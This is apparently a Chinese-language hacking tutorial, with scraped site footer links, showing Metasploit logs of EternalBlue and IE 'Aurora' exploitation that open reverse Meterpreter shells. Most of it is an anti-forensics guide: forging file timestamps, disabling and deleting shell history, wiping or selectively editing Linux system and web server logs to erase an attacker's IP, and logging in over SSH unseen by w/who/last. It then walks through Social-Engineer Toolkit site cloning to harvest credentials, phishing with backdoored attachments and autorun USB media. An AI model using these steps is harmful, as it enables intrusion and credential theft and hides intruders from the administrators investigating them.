[+] 192.168.0.158:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.0.158:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Session 3 created in the background.
msf6 exploit(windows/smb/ms17_010_eternalblue) > session -u 3
[-] Unknown command: session
msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions -u 3
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [3]
[*] Upgrading session ID: 3
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.0.150:4433
msf6 exploit(windows/smb/ms17_010_eternalblue) >
[*] Sending stage (200774 bytes) to 192.168.0.158
[*] Meterpreter session 4 opened (192.168.0.150:4433 -> 192.168.0.158:49325) at 2022-06-28 14:14:39 +0800
[*] Stopping exploit/multi/handler
msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions -i 4
[*] Starting interaction with 4...*/
meterpreter >
meterpreter > irb
[*] Starting IRB shell...
[*] You are in the "client" (session) object
irb: warn: can't alias kill from irb_kill.
>> fs.dir.pwd
=> "C:\\Windows\\system32"


对IE浏览器激光漏洞进行渗透利用


Windows XP

msf6 > use exploit/windows/browser/ms10_002_aurora
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/browser/ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(windows/browser/ms10_002_aurora) > show options
Module options (exploit/windows/browser/ms10_002_aurora):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.0.150    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   0   Automatic
msf6 exploit(windows/browser/ms10_002_aurora) > set SRVPORT 80
SRVPORT => 80
msf6 exploit(windows/browser/ms10_002_aurora) > set URIPATH /
URIPATH => /
msf6 exploit(windows/browser/ms10_002_aurora) > set lport 443
lport => 443
msf6 exploit(windows/browser/ms10_002_aurora) > exploit -z
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.0.150:443
[*] Using URL: http://192.168.0.150/
[*] Server started.
msf6 exploit(windows/browser/ms10_002_aurora) > [*] 192.168.0.106    ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption

抹杀记录

当我们达到了目的之后,有时候只是为了黑入网站挂黑页,炫耀一下;或者在网站留下一个后门,作为肉鸡,没事的时候上去溜达溜达;亦或者挂入挖矿木马;但是大家千万不要干这些事,这些都是违法的!

我这里只是教大家在渗透进去之后如何清除我们留下的一部分痕迹,并不能完全清除,完全清除入侵痕迹是不可能的!主要是增加管理员发现入侵者的时间成本和人力成本。只要管理员想查,无论你怎么清除,还是能查到的。

最主要还是要以隐藏自身身份为主,最好的手段是在渗透前挂上代理,然后在渗透后痕迹清除。


Windows

PowerShell修改时间命令

$(DATE) 表示当前日期和时间;

$(Get-Date) 同$(DATE),表示当前日期和时间;

$(Get-Date "MM/DD/YYYY HH24:MI:SS") 表示指定的日期和时间;

$(Get-Item abc.txt) 表示获取文件的句柄;

$(Get-Item abc.txt).creationtime 获取文件创建时间

$(Get-Item abc.txt).lastaccesstime 获取文件最后访问时间

$(Get-Item abc.txt).lastwritetime 获取文件修改时间

 

# 设置文件test.txt的时间为当前时间

$(Get-Item abc.txt).creationtime=$(DATE)

$(Get-Item abc.txt).lastaccesstime=$(DATE)

$(Get-Item abc.txt).lastwritetime=$(DATE)

 

# 设置文件abc.txt的时间为指定的某个时间

$(Get-Item abc.txt).creationtime=$(Get-Date "11/04/2019 20:42:23")

$(Get-Item abc.txt).lastaccesstime=$(Get-Date "11/04/2019 20:42:23")

$(Get-Item abc.txt).lastwritetime=$(Get-Date "11/04/2019 20:42:23")


其他记录

清理“运行”中的历史记录

  • 开始菜单中的“运行”菜单里保存着我们通过它运行过的程序及所打开的文件路径与名称。
  • 进入注册表编辑器,找到HKEY_CURRENT_ USER\Sortware\Microsoft\Windows\Currentversion\Esploier\Runmru分支。从中选择不需要的或不想要别人看到的记录删除即可。


清理“查找”中的历史记录

  • (1)、清理查找计算机的历史记录
  • 进入注册表编辑器,找到HKEY_CURRENT_USER\Software\Microsoft\Search Assistant\ACMru\5647分支,选择不需要的或是不想让别人看到的记录删除即可。
  • (2)清理查找文件的历史记录

进入注册表编辑器,找到HKEY_CURRENT_USER\Software\Microsoft\Search Assistant\ACMru\5603分支,从中选择不需要的或是不想让别人看到的记录删除即可。


清理“我最近的文档”中的历史记录

  • 在任务栏上右单击,打开“任务栏和开始菜单属性”对话框。单击“开始菜单”“自定义”“高级”,单击“清理”按钮即可清理最近访问过的全部文档。如图2。
  • 如果只想删除自己的记录,可以进入资源管理器中的“C:\Documentsnnd Settings\Adminnisyror(用户自己的帐号)\Recent”文件夹,删去自己不想要别人看到的文档即可。


禁止显示上一次登录者的名称

进入注册表编辑器,找到HKEY_ LOCAL_ MACHINE \ Software \ Microsoft \ windowsNT \ Currentversion \ Winlogin 分支,新建一个“DontDisplayLastUserName”的字符串值,并设为“1”,重新启动后,就再不会显示上次登录的用户名了,当需要显示上次登录的用户名时设为“0”即可。


清理“回收站”

  • 在windows中简单地删除文件只是将文件转移到了“回收站”中,随时可以恢复查看。比较保险的做法是按住shift再点“删除”,或右击桌面上的“回收站”,选择“属性”,在“全局”选项卡中选择“所有驱动器均使用同一设置”,然后勾选下方的“删除时不将文件移回回收站,而是直接删除”,单击“确定”。


清理剪切板中的记录

  • 剪贴板里有时会隐藏着我们太多的秘密,如果不关机就直接离开,下一个上机的人只要按一下Ctrl+V,刚才在剪贴板中的信息就被别人“盗取”了。无需研究如何清空剪贴板,只需用Ctrl+C再随便复制一段无关的内容,原来的内容就会被覆盖。


清理TEMP文件夹中的记录

  • 许多应用程序通常会临时保存你的工作结果,离机前应删除被存放在C:\(系统安装盘符)Documents and Settings\Administrator(当前登录用户)\Local Settings\Temp目录下的临时文件。


Linux

修改文件时间戳

ls -l test.txt
# 修改文件的修改时间和访问时间
touch -d "2018-04-18 08:00:00" test.txt
touch -t 0101080000 test


清除history历史命令记录

#方法1

history       # 查看历史操作命令(在Kali Linux下无效)
cat  ~/.bash_history       # history记录文件
vim ~/.bash_history
history –c


#方法2

使用vim打开一个文件

vim test.txt
# 设置vim不记录命令,vim会将命令历史记录,保存在viminfo文件中。
:set history=0
:!command


#方法3

#通过修改配置文件/etc/profile,使系统不再保存命令记录。默认情况下历史命令将保存1000条,可以将该值改为0,然后保存并退出,最后重启系统使得配置文件生效。


HISTSIZE=0


#方法4

#登录后执行下面命令,不记录历史命令(.bash_history)


unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0


#方法5

仅在Kali Linux下


rm -rf /root/.zsh_history


清除系统日志痕迹

/var/log/btmp   记录所有登录失败信息,使用lastb命令查看

/var/log/lastlog 记录系统中所有用户最后一次登录时间的日志,使用lastlog命令查看

/var/log/wtmp记录所有用户的登录、注销信息,使用last命令查看

/var/log/utmp记录当前已经登录的用户信息,使用w,who,users等命令查看

/var/log/secure   记录与安全相关的日志信息

/var/log/message  记录系统启动后的信息和错误日志


echo > /var/log/btmp:#清除登录系统失败的记录,查看用lastb命令

echo > /var/log/wtmp:#清除登录系统成功的记录,查看用last命令

echo > /var/log/lastlog:清除用户最后一次登录时间,查看用lastlog命令

echo >/var/log/utmp:清除当前登录用户的信息,查看使用w,who,users等命令

cat /dev/null >/var/log/secure:清除安全日志记录

cat /dev/null >/var/log/message:清除系统日志记录

echo > /var/log/secure //登录信息

echo > /var/log/messages

echo>/var/log/syslog //记录系统日志的服务

echo>/var/log/xferlog

echo>/var/log/auth.log

echo>/var/log/user.log

cat /dev/null > /var/adm/sylog

cat /dev/null > /var/log/maillog

cat /dev/null > /var/log/openwebmail.log

cat /dev/null > /var/log/mail.info


清除系统日志痕迹

#日志文件全部被清空,太容易被管理员察觉了,如果只是删除或替换部分关键日志信息,那么就可以完美隐藏攻击痕迹。

# 删除所有匹配到字符串的行,比如以当天日期或者自己的登录IP

sed  -i '/自己的ip/'d  test.txt

sed  -i '/192.168.1.2/'d test.txt

# 全局替换登录IP地址:

sed 's/要被取代的字串/新的字串/g'

sed -i 's/192.168.1.1/192.168.1.2/g' test.txt


隐藏远程SSH登录记录

#隐身登录系统,不会被w、who、last等指令检测到。

ssh -T root@192.168.0.1 /bin/bash -i

#不记录ssh公钥在本地.ssh目录中

ssh -o UserKnownHostsFile=/dev/null -T user@host /bin/bash –I


清除Web入侵痕迹

#直接替换日志ip地址

sed -i 's/192.168.166.85/192.168.1.1/g' apache/logs/access.log

#常见日志地址


Apache

%APATCH_HOME%//logs/access.log       # 访问日志

%APATCH_HOME%/logs/error.log       # 错误日志


Nginx

%NHINX_HOME%/logs/access.log       # 访问日志

%NHINX_HOME%/logs/error.log       # 错误日志


Tomcat

%TOMCAT_HOME%/logs/localhost_access_log.YYYY_MM_DD.txt       # 请求日志

%TOMCAT_HOME%/logs/catalina.YYYY_MM_DD.log       # 启动日志

%TOMCAT_HOME%/logs/localhost.YYYY_MM_DD.log        # 本地日志

%TOMCAT_HOME%/logs/host-manager.YYYY_MM_DD.log       # manager管理日志

%TOMCAT_HOME%/logs/manager.YYYY_MM_DD.log       # manager专有日志


清除MySQL痕迹

rm ~/.mysql_history
cat /dev/null > ~/.mysql_history


社会工程学


git clone https://github.com/trustedsec/social-engineer-toolkit/
setoolkit/
cd setoolkit
pip3 install -r requirements.txt
python setup.py
gedit /etc/setoolkit/set.config


网络钓鱼攻击(Spear-Phishing Attack Vector)

利用文件格式漏洞(如PDF)等生成后门并通过emailGMAIL,SENDMAIL,)向目标发送带后门附件的电子邮件,诱使目标打开附件激活后门。

例子:

#cd /usr/share/set
# ./setoolkit select from the menu
1) Social-Engineering Attacks
1) Perform a Mass Email Attack
3) Credential Harvester Attack Method
2) Site Cloner
set:webattack> IP address for the POST back in Harvester/Tabnabbing [192.168.0.150]: 192.168.0.150
set:webattack> Enter the url to clone: www.baidu.com
[*] Cloning the website: http://www.baidu.com
[*] This could take a little bit...
The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website.
[*] The Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:

image.png


WEB 方式攻击

SET 可以克隆一个网站并植入后门以此迷惑目标打开此网站并中招。


Java Applet 方式

最成功的方式之一,并不是利用java 的漏洞,而是当目标浏览含后门的仿冒站点时会被询问是否允许执行web 中的java applet,一旦点击允许则payload 开始运行,目标将被重定向到真实的网站。


用户端(Client-sideweb exploit 方式

利用用户端存在的软件漏洞,一般使用0day进行攻击的效果最好。


账号密码获取(Username and Password Harvesting

通过克隆一个目标站并诱使攻击目标登陆,截获其账号密码。例如截获GMAIL 密码。

标签页绑架(Tabnabbing):当目标打开多个标签页浏览网站并切换标签页时,网站侦测到目标的行为并显示让目标等待的信息,恰好目标打开了被绑架的标签页并要求在相似程度惊人的网站里输入登陆凭据,当目标输入之后登陆信息即被截获,同时被重定向到真实网站。


中间人攻击(Man-Left-in-the-Middle

此方式使用已经被攻陷的网站的HTTP 请求或者网站的XSS 漏洞让用户的登陆信息发送至攻击者的HTTP 服务器。如果你发现了一个网站的XSS 漏洞,可以利用此漏洞构造一个URL发送给目标诱使其打开并登陆以截获登陆信息。


Web Jacking

当目标打开我们的网站时会有一个链接显示为正确的web 地址,此时若目标打开此仿冒链接会被定向到我们的仿冒网站,其登陆信息会被截获。


混合模式(multi-attack

可同时使用以上多种攻击手段以提高成功率。


介质感染攻击(Infectious Media Generator

可以让你生成一张光盘或者U盘,里面包含autorun.inf 来运行指定的后门文件或者file-format 漏洞文件。


迷你USB 人机接口设备(Teensy USB HID

当电脑插入USB 设备且autorun.inf 被禁用时,可使用此方法将USB 设备模拟成一个键盘或鼠标设备,进而截获目标机器的击键记录。


SET 其他特殊功能

包括SET 交互式shell,可用来替代meterpreter;远程管理工具(RATTE);HTTP 隧道,当目标主机只开放HTTP 端口对外放行时可通过此功能与主机进行通信;WEB-GUI,包含了常用攻击和无线攻击向导,输入./set-web 即可运行。


相关实践学习
日志服务之使用Nginx模式采集日志
本文介绍如何通过日志服务控制台创建Nginx模式的Logtail配置快速采集Nginx日志并进行多维度分析。
目录
相关文章
|
2月前
|
机器学习/深度学习 人工智能 自然语言处理
自动化测试的新篇章:利用AI提升软件质量
【8月更文挑战第27天】在软件开发的海洋中,自动化测试是确保航船不偏离航线的关键罗盘。随着人工智能(AI)技术的兴起,这艘航船正乘风破浪,以前所未有的速度前进。本文将探索如何通过AI技术优化自动化测试流程,不仅提高测试的效率和覆盖范围,而且增强测试用例的智能生成和结果分析能力。我们将从AI在自动化测试中的应用入手,深入探讨其对测试准确性和效率的影响,以及面临的挑战与未来的发展方向。
|
2天前
|
测试技术 数据安全/隐私保护 开发者
自动化测试的奥秘:如何用Selenium和Python提升软件质量
【9月更文挑战第35天】在软件开发的海洋中,自动化测试是那艘能引领我们穿越波涛的帆船。本文将揭开自动化测试的神秘面纱,以Selenium和Python为工具,展示如何构建一个简单而强大的自动化测试框架。我们将从基础出发,逐步深入到高级应用,让读者能够理解并实现自动化测试脚本,从而提升软件的质量与可靠性。
|
9天前
|
机器学习/深度学习 人工智能 安全
软件测试中的探索性测试:一种高效发现软件缺陷的方法
本文将深入探讨软件测试中的一种关键方法——探索性测试。探索性测试是一种动态的、探索性的软件测试方法,它依赖于测试人员的直觉和经验,通过实际操作软件来发现潜在的问题和缺陷。与传统的基于预定义用例的测试方法相比,探索性测试更加灵活,能够更全面地覆盖软件的各个方面,从而更有效地发现难以预见的错误和漏洞。
|
12天前
|
测试技术 持续交付 Python
自动化测试之美:打造高效的软件质量保障体系
【9月更文挑战第25天】在软件开发的海洋中,自动化测试是一艘能够引领我们高效航行的帆船。它不仅能帮助我们发现缺陷,更是一个持续集成和持续部署(CI/CD)过程中不可或缺的部分。本文将通过浅显易懂的语言和实际代码示例,引导读者理解自动化测试的价值,并学会如何实施它,从而提升软件的质量与开发效率。
31 4
|
11天前
|
敏捷开发 监控 测试技术
提升软件质量的利器:自动化测试的实践与反思
在软件开发的生命周期中,测试作为保障产品质量的重要环节,其重要性不言而喻。随着敏捷开发和持续集成等实践的普及,传统的手动测试方式已逐渐无法满足快速迭代的需求。因此,自动化测试作为一种提高测试效率和准确性的有效手段,正受到越来越多开发者的青睐。本文将深入探讨自动化测试的价值、实施步骤以及在实践中可能遇到的问题和解决方案,帮助读者更好地理解和应用自动化测试。
13 2
|
17天前
|
测试技术 持续交付 云计算
提升软件质量的关键路径:高效测试策略与实践
在当今数字化时代,软件已成为企业运营和产品服务的核心。随着软件开发周期的不断缩短和市场需求的迅速变化,确保软件质量成为开发过程中的首要任务。本文将探讨如何通过高效的测试策略和实践来提升软件质量,包括自动化测试、持续集成、代码审查等关键技术和方法。通过对这些技术的应用和整合,软件开发团队可以在竞争激烈的市场环境中保持领先地位,为用户提供高质量的产品和服务。
|
1月前
|
机器学习/深度学习 人工智能 自然语言处理
AI驱动的自动化测试:提升软件质量的未来之路
【9月更文挑战第3天】AI驱动的自动化测试是提升软件质量的未来之路。它借助AI技术的力量,实现了测试用例的智能生成、测试策略的优化、故障预测与定位等功能的自动化和智能化。随着技术的不断进步和应用场景的不断拓展,AI驱动的自动化测试将在未来发挥更加重要的作用,为软件开发和运维提供更加高效、准确和可靠的解决方案。
|
11天前
|
测试技术 UED 开发者
软件测试的艺术:从代码审查到用户反馈的全景探索在软件开发的宇宙中,测试是那颗确保星系正常运转的暗物质。它或许不总是站在聚光灯下,但无疑是支撑整个系统稳定性与可靠性的基石。《软件测试的艺术:从代码审查到用户反馈的全景探索》一文,旨在揭开软件测试这一神秘面纱,通过深入浅出的方式,引领读者穿梭于测试的各个环节,从细微处着眼,至宏观视角俯瞰,全方位解析如何打造无懈可击的软件产品。
本文以“软件测试的艺术”为核心,创新性地将技术深度与通俗易懂的语言风格相结合,绘制了一幅从代码审查到用户反馈全过程的测试蓝图。不同于常规摘要的枯燥概述,这里更像是一段旅程的预告片,承诺带领读者经历一场从微观世界到宏观视野的探索之旅,揭示每一个测试环节背后的哲学与实践智慧,让即便是非专业人士也能领略到软件测试的魅力所在,并从中获取实用的启示。
|
1月前
|
安全 测试技术 数据库
华测检测软件登记测试
软件产品登记测试由检测机构根据委托方提供的材料,验证软件功能是否正常运行。自2000年起,测试报告可用于增值税退税、双软认证评估及高新企业认定等。测试涵盖应用、嵌入式、数据库及系统软件等,依据GB/T 25000.51-2016标准,确保软件质量并提升产品销售力及企业信任度。由具备CNAS及CMA资质的CTI华测检测提供专业服务,涵盖通用应用软件测评、APP安全检测及信息安全服务等多个方向。
|
2月前
|
监控 数据管理 jenkins
深入理解与应用软件自动化测试框架
【8月更文挑战第30天】在现代软件开发周期中,自动化测试已成为提高测试效率、保证软件质量的关键步骤。本文将探讨自动化测试框架的设计与实现,重点放在如何根据不同项目需求选择合适的测试框架,以及如何有效地集成到现有的开发和测试流程中。通过分析几个流行的自动化测试工具,如Selenium、Appium和JUnit,我们将讨论它们的特点、优势以及可能面临的挑战。此外,文章还将介绍一些最佳实践,帮助读者构建稳定且易于维护的自动化测试环境。
下一篇
无影云桌面